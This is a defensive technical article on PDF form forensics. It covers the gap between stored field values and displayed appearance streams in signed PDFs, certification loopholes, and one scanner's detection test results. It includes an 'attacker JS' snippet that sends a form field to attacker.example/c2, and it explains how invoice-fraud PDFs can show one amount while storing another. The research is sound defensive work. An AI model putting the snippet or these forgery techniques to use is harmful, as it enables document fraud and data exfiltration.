PDF Forms as Executable Security Boundaries: V/AP Divergence, DocMDP, and What Gets Certified

Q: What does /NeedAppearances true mean for a digitally signed PDF?

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer regenerates appearance streams from /V field values at document open time — the /AP streams stored on disk are stale by construction. Combined with a digital signature, the byte-range hash covers the stale /AP, but the viewer regenerates the appearance from /V after opening. The provenance of what is displayed and what was certified is always structurally different.

Q: What is the difference between a PDF form field's /V value and its /AP /N appearance stream?

/V is the field's machine-readable value — a string or name object read by JavaScript (doc.getField().value), included in form submissions, and covered by the digital signature byte-range hash. /AP /N is a self-contained PDF content stream the viewer decompresses and renders as pixels — it is what the user sees on screen. The two are authored independently and are not derived from each other. Only the viewer reads /AP; everything else reads /V.

Q: Which PDF authoring tools produce legitimate /NeedAppearances true documents?

Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents — including mail-merge pipelines, PDF form-fill libraries, and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented) that prioritise speed over appearance stream completeness. On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, which is rarely produced by legitimate tooling. Running qpdf --generate-appearances before signing eliminates the condition by rebuilding all AP streams from current /V values.

New — population-scale companion: PDF Forensics at Scale runs the scanner against 1,572 real-world PDFs — including 400 live malware samples — reporting live-malware detection, the real-world false-positive rate, and the files that crash a scanner (and how the engine was hardened).

Background: Two Data Paths, One Signature

In auditing the incremental-update logic in our PDF forensics scanner we identified a gap: the set-difference approach to injected object detection silently passed redefined objects carrying the same object ID. Fixing that led into a deeper examination of DocMDP — how certified signatures interact with permitted incremental updates. That work surfaced a more fundamental structural problem: the relationship between what a PDF AcroForm field displays and what it stores as machine-readable data. This article documents the V/AP problem in full.

Every AcroForm field has two independent data stores:

Key	What it contains	Who reads it
`/V`	The machine-readable field value	JavaScript (`doc.getField().value`), form submission (`SubmitForm`), digital signature byte-range hash
`/AP /N`	A self-contained PDF content stream that the viewer renders as pixels	The viewer, the user — nothing else

These two stores are not derived from each other. A PDF author can set /V to (I agree to transfer $1,000) and author an /AP stream that renders I agree to transfer $10. The user signs what they see. The signature covers both. The signed content and the displayed content are structurally different by construction, inside the certified byte range.

Prior Research and Known Exploitation

The structural relationship between signed PDF content and rendered output has been studied in the academic literature. Mainka, Mladenov, Rohlmann, and Schwenk published “Shadow Attacks: Hiding and Replacing Content in Signed PDFs” (NDSS 2021), identifying three attack classes — Hide, Hide-and-Replace, and Replace — that exploit the gap between the byte range a signature covers and the content the viewer renders. The disclosure reached 28 PDF viewer vendors and produced patches across Adobe Acrobat, Foxit, LibreOffice, and others. An earlier line of research by Müller, Mladenov, Somorovsky, and Schwenk (“PDF Insecurity” series, 2017–2019) systematically mapped signature-validation weaknesses across major PDF viewers, establishing the framework that later Shadow Attack work built on. ISO 32000-2:2020 introduced clarifications in response to some of these findings, though the V/AP structural separation itself is a fundamental consequence of the format’s design, not a defect that can be patched at the specification level.

In operational settings, the same mechanism is directly applicable to invoice fraud and signed financial workflows: a signed invoice PDF where an automated payment system reads /V while the human signer saw what /AP rendered. A field that displays “$1,200.00” to the signer while /V holds “$12,000.00” survives signature validation intact — no modification of the signed byte range is required, and no viewer warning is produced.

Several concrete vulnerability patterns exploit the AcroForm field model and are detected by this scanner:

CVE	Pattern	Mechanism
CVE-2021-28550 APSB21-29	AcroForm + `getField` / `setFocus` JavaScript	Use-after-free in Acrobat’s form field manipulation path, triggered by specific `getField()` and `setFocus()` call sequences in AcroForm JavaScript
CVE-2021-21017 APSB21-09	XFA + JavaScript + `instanceManager`	Heap buffer overflow via XFA form handling; exploited in the wild before patching. XFA is deprecated in PDF 2.0 but still rendered by Acrobat
CVE-2024-45112 APSB24-70	XFA/AcroForm mixed field access	Type confusion triggered when a document mixes XFA and AcroForm field access in the same session — a pattern not present in legitimately authored forms
CVE-2023-21608 APSB23-01	Annotation + `event.target` JavaScript	Use-after-free in the annotation engine triggered via `event.target` references in AcroForm field event handlers (CVSS 7.8)

XFA-based forms more broadly have been observed in malware campaigns abusing FormCalc and JavaScript execution triggered at document open. XFA scripting is structurally separate from AcroForm JavaScript: a scanner inspecting only AcroForm paths may not examine XFA-embedded FormCalc or JavaScript at all, since the execution model and content location differ between the two form architectures.

Threat Perspective: Where V/AP Analysis Fits

PDF-delivered threats exist across a wide spectrum of sophistication. The overwhelming majority of malicious PDFs observed in the wild do not involve form field structure at all. The high-volume threat classes are:

Phishing overlays — a rendered page that prompts for credentials or directs the user to an external URL. No AcroForm required; often no JavaScript.
Social engineering — instructions to enable content, call a number, scan a QR code, or download an attached file. Relies on user behavior, not structural manipulation.
JavaScript exploits targeting Acrobat’s engine — CVE-2008-2992, CVE-2009-0927, CVE-2018-4990, and more recent entries. These use JavaScript as a delivery mechanism but typically do not depend on form field data.
Embedded payloads via /EmbeddedFile streams, /Launch actions, or polyglot structures that contain executable content.

These are high-volume, operationally dominant attacks. They are detected through URL analysis, embedded file inspection, static JavaScript analysis, YARA pattern matching, and ClamAV signatures — not V/AP structural comparison. Commodity phishing PDFs do not need form field manipulation. They exploit user trust, not signing semantics.

V/AP divergence analysis is relevant to a different, narrower threat class: documents where the PDF form carries legal or financial authority, and where an attacker benefits from the gap between what a human reader sees and what a machine processes. The applicable scenarios are:

Scenario	Why V/AP matters	Where simpler analysis is sufficient
Signed financial contract	Signer’s view may differ from submitted field values; digital signature certifies both	Unsigned or unsigned-but-phishing documents don’t need this analysis
Automated invoice processing	Payment pipeline reads `/V` for transaction amount; AP renders a different figure	Phishing invoices asking users to wire funds directly don’t need form manipulation
Regulatory or legal submission	The certified content is referenced by downstream systems as authoritative	Drive-by malware delivery doesn’t require form field structure
E-signature platform forensics	Contested signed documents require structural audit of what the byte range actually certified	Standard AV/EDR scanning handles most commodity threats at this layer

Being explicit about scope is part of being accurate. The structural indicators in this article are most applicable to high-value signed document workflows and forensic analysis of contested PDFs. They are not the right primary tool for blocking commodity phishing PDFs, which are better addressed by URL reputation, sender analysis, and static JS inspection. Both are necessary; they target different points on the threat spectrum.

Five Structural Indicators: V/AP Divergence Without Rendering

The fundamental constraint for deterministic V/AP analysis is avoiding the renderer. Rasterising a field region and running OCR introduces renderer-specific differences, font fallback differences, DPI-dependent text segmentation, OCR nondeterminism, and false-positive rates that are incompatible with forensic guarantees. Every indicator below derives from the raw PDF object model, reproducibly, without opening the file in a viewer.

/NeedAppearances True

When /NeedAppearances true is present in the AcroForm dictionary (ISO 32000 §12.7.2), the viewer is instructed to regenerate /AP from /V at open time. The /AP streams stored on disk are stale by construction — they may not reflect /V. On its own this is medium severity: stale AP is common in programmatic form-fill workflows (mail merge, e-signature platforms and mail-merge tools — DocuSign-generated PDFs have been observed to carry /NeedAppearances true; this is observed behavior, not vendor-documented) that update /V but skip AP regeneration before saving.

Combined with a digital signature it is critical. The byte-range hash covers the stale /AP. The viewer regenerates the appearance after opening. The signed content and the displayed content are structurally separated — the viewer regenerates appearance from /V at open time, so what is displayed is never the signed /AP stream. The visual output may agree if /V and the stale /AP happen to contain the same value, but the provenance of what is displayed and what is certified is always structurally different.

Checkbox and Radio: /V vs /AS Key Comparison

For checkbox and radio button fields, /AS (Appearance State) selects which entry in /AP /N the viewer renders. /V is the stored data value. Both are name objects in the widget annotation dictionary. We extract both via regex against the xref object and compare them as strings — no rendering, no approximation.

If /V is /Yes and /AS is /Off, the displayed state and the stored value structurally disagree. That fact is in the file regardless of any viewer. This is the simplest V/AP check to verify: a pure dictionary key comparison.

In a signed document both /V and /AS fall within the signed byte range. The mismatch is by construction inside certified content.

AP Stream Text Extraction: Text, Listbox, Combobox

For text fields, listboxes, and comboboxes, the /AP /N stream is a PDF content stream containing text drawing operators. We decompress it via PyMuPDF, extract Tj, TJ, and ' operators, reconstruct the display string, PDF-unescape it, whitespace-normalise it, and compare it to /V.

Three encoding cases are handled:

Literal string /V — /V (Hello) — extracted directly
Hex-string /V — /V <48656c6c6f> — decoded via bytes.fromhex(); UTF-16BE (BOM FEFF) detected and decoded correctly
Listbox multi-select array — /V [(opt1) (opt2)] or [<hex1> <hex2>] — elements joined for comparison

For listbox and combobox fields, /Opt can store display/export pairs: [[(United States) (us)] [(United Kingdom) (uk)]]. The /V holds the export value (us); the /AP renders the display label (United States). Without resolving this map, every legitimately authored dropdown using export-value pairs would fire a false positive. We build an export→display map from /Opt and substitute the display label as the comparison target before checking.

When the /AP stream exists but contains no text drawing operators at all, we flag it separately: the value is present in the file and covered by any signature, but the field renders blank to the viewer.

Value Set, No AP Defined

When /V is non-empty but no /AP stream exists, the viewer falls back to the field’s /DA (Default Appearance) and constructs a rendering itself. The displayed content is viewer-defined — it is not statically present in the file. Different viewers may render different things. Medium severity.

Correlation Engine Compound Patterns

Four compound indicators in the weighted correlation engine (Engine 44 — Correlation Engine) fire on combinations:

Combination	Severity	Why
`/NeedAppearances` + digital signature	Critical	Signed bytes guarantee to cover a different appearance than what the viewer displays
V/AS mismatch + digital signature	Critical	Displayed state and certified value structurally differ within the same signed byte range
`/NeedAppearances` + JS or SubmitForm	High	Stale AP paired with active form content — the displayed values may differ from what is executed or exfiltrated
`/NeedAppearances` + DocMDP constraint violation	Critical	Uncertified modification rendered visible via viewer-regenerated appearance

Note on test scores: The Critical escalation for /NeedAppearances + digital signature fires only when both conditions are present in the same file. 01_need_appearances.pdf in the test corpus below carries no digital signature; it scores 81 (MEDIUM) — consistent with this table since the signature condition does not apply and the compound Critical indicator does not trigger.

Engine 47 aggregates findings from all upstream engines. V/AP indicators from Engine 25 (AcroForm Field Forensics) feed directly into it alongside signature forensics and JS behavioral emulation results. For the full 47-engine architecture — including how V/AP findings interact with the JS Behavioral Emulator (Engine 41) and Signature Forensics (Engine 21) — see the scanner architecture documentation →

Live Detection: Nine Test PDFs, Real Scanner Output

Each structural indicator described above was validated against a minimal hand-crafted PDF targeting that specific condition. One additional control file was built with correctly authored, matching V and AP values to check for false positives. All files were built from raw bytes without any PDF library and submitted to the scanner live. File sizes range from 707 to 1,212 bytes.

Test file	Condition planted	Threat · Deception → Verdict	Indicators (n / severity)	Primary indicator fired
`01_need_appearances.pdf` 758 bytes	`/NeedAppearances true` in AcroForm dict; text field with `/V (12000.00)`, no `/AP`	0 · 20 → suspicious	6 total 4 medium · 2 low	[MEDIUM] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale
`02_checkbox_vap_mismatch.pdf` 941 bytes	Checkbox widget: `/V /Yes` but `/AS /Off`	0 · 25 → suspicious	4 total 1 high · 1 medium · 2 low	[HIGH] AcroForm: Checkbox Field “approved” — Value/Appearance State Mismatch (V=Yes, AS=Off)
`03_text_vap_mismatch.pdf` 913 bytes	Text field: `/V (Rejected)`; AP stream renders “Approved”	0 · 25 → suspicious	4 total 1 high · 1 medium · 2 low	[HIGH] AcroForm: Text Field “status” — Value/Appearance Mismatch
`05_missing_ap.pdf` 742 bytes	Text field: `/V (99750.00)`, no `/AP` key defined	0 · 10 → suspicious	5 total 3 medium · 2 low	[MEDIUM] AcroForm: Text Field “total_amount” — Has Value But No Appearance Stream
`06_js_field_conditioning.pdf` 1,166 bytes	OpenAction JS reading `status` (`/V approved`) and conditionally posting `amount` (`/V 75000.00`) to external URL	260 · 20 → high-risk	14 total 5 critical · 2 high · 5 medium · 2 low	[CRITICAL] OpenAction + JavaScript; [CRITICAL] YARA: Auto-Open + Executable
`07_need_appearances_signed.pdf` 1,206 bytes	`/NeedAppearances true` + structural `/Sig` field + `/DocMDP P=2`; text field `/V (12000.00)`, no `/AP`	260 · 110 → high-risk	17 total 4 critical · 4 high · 6 medium · 3 low	[CRITICAL] AcroForm: /NeedAppearances true — Stored Appearance Streams Stale; [CRITICAL] NeedAppearances + Digital Signature — Certified Content Diverges from Displayed
`E4_image_ap_structural.pdf` 938 bytes	Text field `/V (1200.00)`; AP stream is an image XObject invoked via `Do` — no text operators present	0 · 25 → suspicious	5 total 1 high · 2 medium · 2 low	[HIGH] AcroForm: Text Field “amount” — Image-Based Appearance Stream (V Not Visually Verifiable)
`E5_fieldmdp_empty_fields.pdf` 1,212 bytes	FieldMDP signature with `Action=Include` and empty `/Fields []` array — appears to lock named fields but locks none	245 · 10 → high-risk	14 total 2 critical · 4 high · 5 medium · 3 low	[HIGH] FieldMDP: Include Action With Empty /Fields — Locks Nothing
`00_clean_match.pdf` 707 bytes — control	Text field: `/V (1200.00)`; AP stream renders `1200.00` via `Tj` operator — values agree; no `/NeedAppearances`	0 · 0 → clean	4 total 0 V/AP · 0 threat · structural only	No V/AP indicator fired and no threat: the control is correctly `clean`. The unrelated factors that previously elevated it (empty metadata, and a benign differential-parsing disagreement where MuPDF sees no AcroForm while Poppler/pdfminer do) are now booked to the neutral structural axis and do not affect the verdict. The V/AP structural checks correctly stay silent on a well-formed document.

The differential-parsing disagreement on the control file is itself empirically meaningful: three PDF parsers agree on the presence of an AcroForm in a file that MuPDF treats as having none — a parser-disagreement indicator firing on a legitimately authored, benign document.

Five scanner findings from the above runs are reproduced verbatim below.

Finding 1 — Text Field V/AP Mismatch

Severity:  HIGH
Indicator: AcroForm: Text Field "status" — Value/Appearance Mismatch
Engine:    AcroForm Field Forensics

Field "status" (xref 5): /V stores "Rejected" but the /AP /N appearance stream
(xref 7) renders "Approved". The viewer displays "Approved"; any form submission,
JavaScript getField() read, or digital signature byte-range will reference
"Rejected". The structural disagreement is provable from the raw PDF object model
without rendering.

Finding 2 — Checkbox V/AS Mismatch

Severity:  HIGH
Indicator: AcroForm: Checkbox Field "approved" — Value/Appearance State Mismatch
           (V=Yes, AS=Off)
Engine:    AcroForm Field Forensics

Field "approved" (xref 5): /V is /Yes (the stored data value) but /AS is /Off
(the appearance-state key that selects which /AP /N entry the viewer renders).
The checkbox appears unchecked to the viewer; the stored value is checked. Both
/V and /AS fall within any signed byte range — the mismatch is by construction
inside certified content.

Finding 3 — Field-Value Seeding in the JS Emulator

The JS field-conditioning test PDF reached a threat score of 260 (high-risk) on static analysis alone — held at high-risk rather than dangerous because, while “OpenAction + JavaScript” is a confirmed attack chain, the threat score stays under the dangerous band; its aggregate across all axes is 456. The relevant emulator context: Engine 25 (AcroForm Field Forensics) extracted field_values = {"status": "approved", "amount": "75000.00"} from the AcroForm field dictionaries and passed them to the JS emulator stub. Without this seeding, doc.getField('status').value returns ''; the condition '' == 'approved' is false; the app.launchURL() branch is never taken, and the emulator reports clean. With real field values, the condition evaluates correctly and any URL-launch or submit event is emitted with the actual exfiltration payload.

Finding 4 — Image-Based AP Structural Flag

Severity:  HIGH
Indicator: AcroForm: Text Field "amount" — Image-Based Appearance Stream
           (V Not Visually Verifiable)
Engine:    AcroForm Field Forensics

Field "amount": /V stores "1200.00" but the /AP /N stream (xref 5) contains
only a Do operator invoking an image XObject (xref 6) — no Tj or TJ text
operators are present. The viewer renders a rasterised image; the stored /V
value is not derivable from the AP stream without image recognition. The
structural anomaly is deterministic: Do present, text operators absent.
Manual review required to confirm whether the image content matches /V.

Finding 5 — FieldMDP Include Action With Empty Fields

Severity:  HIGH
Indicator: FieldMDP: Include Action With Empty /Fields — Locks Nothing
Engine:    Named Tree and Action Forensics

/TransformMethod /FieldMDP with Action=Include and /Fields []. An Include
action with an explicit field list locks only the named fields; an empty
list locks none. The signature structure certifies the document while
leaving every AcroForm field modifiable post-signing. Validators that
check for FieldMDP presence without inspecting the locked-field set will
report a valid field-integrity certification that provides none.

A note on the scores: every V/AP positive here carries no execution vector, so its threat score is ~0 — it is the Deception (content-integrity) axis that grades them, which is why each reads suspicious or high-risk on its V/AP or signature finding rather than being dismissed as low. The signature-tampering cases (07, E5) grade on the integrity portion of the threat axis. Production forms behave identically: low/zero threat, and the V/AP checks stay silent unless value and appearance genuinely diverge.

Complete Corpus: False-Positive and False-Negative Testing

196 PDF files were submitted to the scanner across six categories: hand-crafted V/AP positive and negative test files, real-world US government tax and agency forms, US federal legislation, academic papers, and Corkami proof-of-concept adversarial files (deliberately malformed or structurally unusual PDFs used for PDF parser research). All 196 were successfully scanned (the blank-AP edge case that previously returned no usable response now scans cleanly and fires its V/AP indicator). All predictions for positive test files were stated before scanning.

Category	Files	Prediction	Result
Structural V/AP positive cases (hand-crafted)	9 scanned	V/AP indicator should fire	9 / 9 detected — 100%
Evasion: hex-encoded `/V` (E1)	1	Hex-decode handles this — should detect	Detected [HIGH] Value/Appearance Mismatch
Evasion: Unicode confusable in `/V` (E2)	1	Byte-level comparison catches it — should detect	Detected [HIGH] Value/Appearance Mismatch
Evasion: font encoding remap (E3)	1	Font glyph table now parsed — should detect	Detected [HIGH] Value/Appearance Mismatch — `/Encoding /Differences` resolved; rendered text 9200.00 vs `/V` 1200.00. Deception 75 → high-risk.
Hand-crafted clean controls (text, checkbox, listbox)	3	No V/AP indicator	0 / 3 false positives
Tool-generated clean PDFs (qpdf, pdflatex, wkhtmltopdf)	3	No V/AP indicator	0 / 3 false positives
IRS tax forms — 44 real AcroForm documents W-9, W-4, 1040, 941, 1120, 1065, 433-A, 1099-NEC, and 37 others. Real JavaScript (field calculations), embedded files, XFA fields, ObjStm. Under the multi-axis verdict these now correctly read low (threat 20–45) — their JavaScript, embedded files and XFA are neutral form-authoring capability on the structural axis, not threat — with zero V/AP indicators. (An earlier single-score model rated the same forms 328–486/“suspicious”; correcting that false elevation while keeping V/AP silent is exactly what the axis split achieves.)	44	No V/AP indicator	0 / 44 false positives
US agency forms (VA-10091, VA-40-1330)	2	No V/AP indicator	0 / 2 false positives
US federal legislation — GovInfo PDFs Infrastructure Investment and Jobs Act, Consolidated Appropriations Act 2021, Tax Cuts and Jobs Act 2017, CARES Act.	4	No V/AP indicator	0 / 4 false positives
Academic papers from arXiv — 29 documents Range of 2023–2025 papers across CS, physics, and mathematics. Standard pdflatex output; no AcroForms.	29	No V/AP indicator	0 / 29 false positives
Corkami PDF PoC adversarial files — 102 documents Deliberately malformed or structurally unusual PDFs: truncated xrefs, PDF version mismatches, orphaned objects, compressed object streams, JavaScript obfuscation, signature edge cases, encoding tricks. Used for differential-parser research.	102	No V/AP indicator	0 / 102 false positives

Metric	Value	Scope caveat
V/AP detection rate	9 / 9 — 100%	All 9 positive cases scanned and detected (the blank-AP edge case now scans cleanly and fires its V/AP indicator); 0 false negatives after font-encoding-remap fix
False-positive rate	0 / 187 — 0.00%	Across 44 IRS forms, 2 agency forms, 4 federal publications, 29 arXiv papers, 102 Corkami PoC files, 6 hand-crafted and tool-generated clean controls
Confirmed false negatives	0	E3 font encoding remap was the only known FN; now detected after `/Encoding /Differences` glyph table resolution was added to AP text extraction
Evasion attempts tested	3 built and scanned; 1 additional structural test	E1 detected, E2 detected, E3 detected (after fix); image-based AP structurally detected (Do operator without text operators); whitespace normalisation and encrypted AP remain outside scope
Independent replication	None	All tests by the authors; test files and generation scripts available for independent replication

A noteworthy secondary finding concerns how those 44 IRS forms are scored overall. They carry JavaScript field-calculation objects, embedded file attachments, XFA form structures and ObjStm compressed object streams — all legitimate interactive-form authoring features. Under the multi-axis verdict these are classified as neutral capability on the structural axis, not threat, so all 44 forms now score low (threat 20–45) with zero V/AP indicators. An earlier single-score model summed those same features into 328–486 points and rated the forms suspicious, then relied on a special-case “form-document context gate” to walk the level back — a patch over a scoring model that conflated capability with threat. The axis split removes the need for that gate: presence of form JavaScript or embedded files no longer inflates the malware verdict in the first place, while the V/AP checks remain free to fire the instant a field’s value and appearance genuinely diverge. The checks correctly separate AcroForm field-value divergence (content integrity) from the active-content capability that legitimately authored government forms routinely carry.

The 102 Corkami PoC adversarial files include PDFs with intentionally broken structure: orphaned xref tables, version header mismatches across parsers, compressed object streams, obfuscated JavaScript, and signature edge cases. None triggered a V/AP indicator. The checks require an AcroForm widget with both /V and /AP keys present — a combination structurally absent from the deliberately minimal Corkami test files.

This is engineering validation on a controlled corpus, not a formal empirical study. The 0/187 false-positive rate covers 187 files across six distinct source categories; the 9/9 detection rate covers all scanned positive cases only. Neither figure generalises to the full population of PDF documents in production environments at scale. Academic validation would require a labelled corpus drawn from operational traffic, independent replication, and statistical significance analysis. That gap is real and is stated here rather than papered over.

Comparative Evaluation: Reference Tools vs. V/AP Checks

To provide context for what the structural checks contribute beyond what existing PDF libraries already expose, the core 11-file corpus (5 positive, 6 negative hand-crafted and tool-generated files) was evaluated against two reference implementations: pikepdf and pdfminer.six. These are production-quality PDF libraries widely used in security research and PDF processing pipelines. The 187-file false-positive corpus above provides the broader real-world negative coverage; the comparative evaluation uses the hand-crafted set where ground truth is unambiguous.

File	Expected	pikepdf v9.x — NeedAppearances + checkbox /V vs /AS only	pdfminer.six v20251230 — field enumeration only	This scanner AP stream text extraction + all checks
`01_need_appearances.pdf`	Positive	✓ Detected	✗ Missed	✓ Detected
`02_checkbox_vap_mismatch.pdf`	Positive	✓ Detected	✗ Missed	✓ Detected
`03_text_vap_mismatch.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`05_missing_ap.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`06_js_field_conditioning.pdf`	Positive	✗ Missed	✗ Missed	✓ Detected
`00_clean_match.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`00b_clean_checkbox.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`00c_clean_listbox_opt.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C1_qpdf_generated.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C2_pdflatex_clean.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator
`C3_wkhtmltopdf_invoice.pdf`	Negative	✗ No indicator	✗ No indicator	✗ No indicator

Method	Detection rate (5 positives)	FP rate (6 negatives)	What it can detect
pikepdf (direct library)	2 / 5 — 40%	0 / 6 — 0%	`/NeedAppearances true`; checkbox `/V` vs `/AS` key comparison. Cannot parse AP stream text operators.
pdfminer.six (direct library)	0 / 5 — 0%	0 / 6 — 0%	Field enumeration only. No V/AP comparison capability in the library API.
This scanner	5 / 5 — 100%	0 / 6 — 0%	All five checks: NeedAppearances, checkbox /AS, AP stream text extraction (Tj/TJ operators), blank AP, missing AP — plus `/Opt` export-value resolution and hex-string `/V` decoding.

pikepdf misses the text-field AP-stream cases (03, 05, 06) because AP stream text extraction requires decompressing the /AP /N content stream, parsing Tj/TJ operators, and PDF-unescaping the result — none of which is exposed in pikepdf’s high-level API. Detecting those cases requires building on top of the library, not just calling it. This is the implementation work documented in the “Five Structural Indicators” section.

Reproducible Methodology

The complete test procedure is reproducible from this description:

Corpus construction. Positive test files were built from raw PDF bytes by hand — a Python script emitting raw PDF tokens, not calling any PDF library. Each file targets exactly one structural condition. Negative files fall into six categories: hand-crafted clean PDFs; tool-generated PDFs (qpdf --generate-appearances, pdflatex, wkhtmltopdf); 44 US IRS tax forms and 2 US VA agency forms downloaded from their respective official government domains; 4 US federal legislative texts from GovInfo (govinfo.gov); 29 academic papers from arXiv; and 102 Corkami PDF proof-of-concept adversarial files from the corkami/pocs repository (deliberately malformed or structurally unusual PDFs used for PDF parser research). Evasion files used the same raw-byte method with targeted structural variations: hex-encoded /V, Unicode confusable characters, and a custom /Font with /Encoding /Differences remapping a digit glyph. All test files and generation scripts are available from the authors on request.
Scanner under test. HTTP POST to https://pqpdf.com/api.php with operation=pdf-scan and the PDF as a multipart file upload — the same endpoint that powers the interactive scanner at pqpdf.com. Response is JSON with an indicators array; each indicator has a key, risk level, and description.
Classification criterion. A file is classified as a V/AP positive detection if any indicator key contains one of the following scanner-specific strings (tight match against actual engine output): Value/Appearance, NeedAppearances, Has Value But No Appearance, Blank AP Stream, No Appearance Stream, Stored Appearance Streams Stale, Appearance State Mismatch. Generic terms such as “Mismatch” were excluded to avoid conflating V/AP results with unrelated differential-parser indicators (e.g. “PDF Version Mismatch”).
Reference tool evaluation. pikepdf evaluated programmatically: /NeedAppearances flag check + /FT /Btn fields /V vs /AS string comparison. pdfminer.six evaluated via field enumeration; no V/AP comparison available in the library API.
Prediction before scanning. For evasion files, the expected outcome (detected/not detected) was stated in the generation script comment before the file was submitted to the scanner.

Normal Interactive PDFs vs. Suspicious Patterns

AcroForms, JavaScript, and automatic actions are standard PDF features used legitimately in millions of documents every day. A sign-and-submit button uses JavaScript. A government tax form uses an AcroForm with /SubmitForm. An e-signature platform uses DocMDP to certify the signed content. A mail-merge system may legitimately produce documents with /NeedAppearances true because it updates /V programmatically without regenerating /AP. None of that is inherently suspicious.

The checks in this article target a specific subset of structural conditions that are rarely present in legitimately authored documents and frequently present in documents where the display and data layers have been deliberately decoupled:

Feature	Normal use	Suspicious pattern
AcroForm + JavaScript	Field validation, conditional field visibility, submit-to-URL on a known endpoint	Field value read and posted to an external URL not visible in the document; conditional branch taken only when a specific field equals a pre-seeded value
`/NeedAppearances true`	Programmatic form fill where AP regeneration is deferred (e-signature platforms including DocuSign — observed behavior; mail merge)	`/NeedAppearances true` combined with a digital signature — displayed appearance is regenerated from `/V` at open time and is never the signed `/AP` stream; structural provenance of what is displayed and what is certified always differs
`/V` vs `/AS` on a checkbox	Should always match in a well-formed document	Structural mismatch: `/V /Yes` but `/AS /Off` — the stored value and displayed state disagree by construction
AP stream text vs `/V`	Should agree after `/Opt` export-value resolution	AP renders “Approved” while `/V` holds “Rejected”; or AP stream is blank while `/V` is non-empty
DocMDP P=1 + incremental update	DSS/LTV additions permitted under ISO 32000-2 §12.8.2.2	Incremental update containing form modifications, annotations, JavaScript, or OpenAction after a P=1 certifying signature

A scanner finding a V/AP mismatch is not saying “this form is dangerous.” It is saying the file contains a structural condition that is worth examining: the value in the file and the value the viewer renders do not agree, and that disagreement is inside the certified byte range. Whether the cause is a buggy form authoring tool, a careless programmatic fill, or a deliberate manipulation is a question the indicator raises — not one it answers.

JavaScript Field-Value Conditioning: A Behavioral Analysis Gap

JavaScript behavioral emulation executes extracted PDF JavaScript in a sandboxed Node.js vm context with a stub of the Acrobat API. The gap documented here applies to any behavioral sandbox that does not seed doc.getField() with real /V values from the file — returning a stub { value: '' } for every field is the natural default when field enumeration and JS emulation run as independent passes without sharing state.

The practical consequence: when malicious JavaScript reads a field value and acts on it — submitting it to a URL, using it in a conditional branch, passing it to app.launchURL() — the emulator captured the event with an empty string rather than the actual content. Exploitation chains conditioned on field values were not followed correctly:

// Attacker JS inside the PDF
if (doc.getField('status').value == 'approved') {
    app.launchURL('https://attacker.example/c2?v=' + doc.getField('amount').value);
}

With value: '', the condition '' == 'approved' is false — the branch is never taken, the LAUNCH_URL event is never emitted, and the emulator reports clean.

The correct approach: the AcroForm field enumeration pass collects a field_values map (field name → /V string) during widget traversal. The behavioral emulator reads this map and prepends const _pq_fv = {...}; to the stub before execution. doc.getField(name) returns the real value from the file; doc.numFields reflects the true field count. SUBMIT_FORM and LAUNCH_URL events carry the actual field content. Signature fields are excluded — their /V is a PKCS#7 blob, not a meaningful string.

DocMDP P=1 and DSS/LTV: What ISO 32000-2 Actually Permits

DocMDP P=1 means the certifying signature permits no modifications to the document whatsoever — not form fill-ins, not annotations, nothing. A nave implementation flags any incremental object after a P=1 signature as a bypass attempt. The problem is that ISO 32000-2 explicitly carves out an exception that such an implementation will violate on a large class of legitimately authored documents.

The relevant specification text is ISO 32000-2 §12.8.2.2 NOTE 2, which explicitly permits DSS (Document Security Store) and LTV (Long Term Validation) additions in an incremental update even under P=1.

DSS carries the material required to validate a digital signature long after the signing certificate’s OCSP responder or CRL distribution point may no longer be online: OCSP responses, certificate revocation lists, and the full certificate chain. Adding this material post-signing is a standard PAdES workflow — it does not modify the certified document content in any MDP sense. Every legitimately LTV-enabled P=1 document was being flagged critical.

The fix detects DSS-only incremental updates: the section contains /DSS or /VRI and has no execution vectors (no JavaScript, no /OpenAction), no annotations, no form elements, and no /AA additional actions. When P=1 and the incremental section is DSS-only, the scanner emits a low-severity informational note citing the spec section rather than a bypass finding. If DSS is mixed with any document modification or execution vector, the full bypass indicator fires as before.

Note on scope: FieldMDP and V/AP

File MDP (FieldMDP, /TransformMethod /FieldMDP) is a distinct transform from DocMDP. Where DocMDP applies a permission level to the entire document, FieldMDP applies per-approval-signature constraints to named form fields — specifying which fields are locked and which are not. Both are detected separately. The DSS/LTV exemption applies to DocMDP P=1 only; FieldMDP constraint validation is unchanged.

FieldMDP is directly relevant to V/AP because it controls which specific field values fall within the coverage of an approval signature. An attacker can craft a FieldMDP that selectively excludes target fields, leaving their values modifiable post-signing while the document carries a valid certification. Three checks are applied: (1) Action=Include with an empty /Fields array — the signature appears to lock fields but locks none; (2) Action=Exclude with named fields — those fields are explicitly not locked, remaining modifiable and V/AP-divergence-susceptible after signing; (3) incremental updates containing /Widget or /AcroForm objects added after a FieldMDP signature — a constraint violation detectable across Acrobat and pdf.js, where validators differ on whether field names are checked against the locked set.

Structural Limits: What Rasterisation Cannot Provide

There is a principled boundary for how far static V/AP analysis can go without rasterisation. Rasterising a field region and running Tesseract against it is technically possible. For deterministic, reproducible forensic analysis that must produce consistent results on the same file across runs, it is the wrong approach for reasons that are architectural, not merely practical.

The problems with rasterisation in this context:

Renderer-specific differences — MuPDF and Ghostscript render the same field differently
Font fallback differences — missing fonts produce different glyphs on different systems
DPI-dependent text segmentation — results change with render resolution
OCR nondeterminism — the same raster produces different strings across runs
Language-model bias — OCR engines correct toward plausible words, hiding injected content
False-positive rates that break the guarantees a forensics engine must provide
Unpredictable latency spikes on large form documents

Everything where V/AP divergence is provable from the raw byte stream — the cases where the file and the display disagree by construction — is covered by the five checks described above. Two cases remain that static analysis cannot fully resolve:

Encrypted fields. When the PDF is encrypted and field values or AP streams require a key to decompress, static extraction of /V or AP content is not possible without the password. These checks apply to unencrypted or successfully decrypted content.
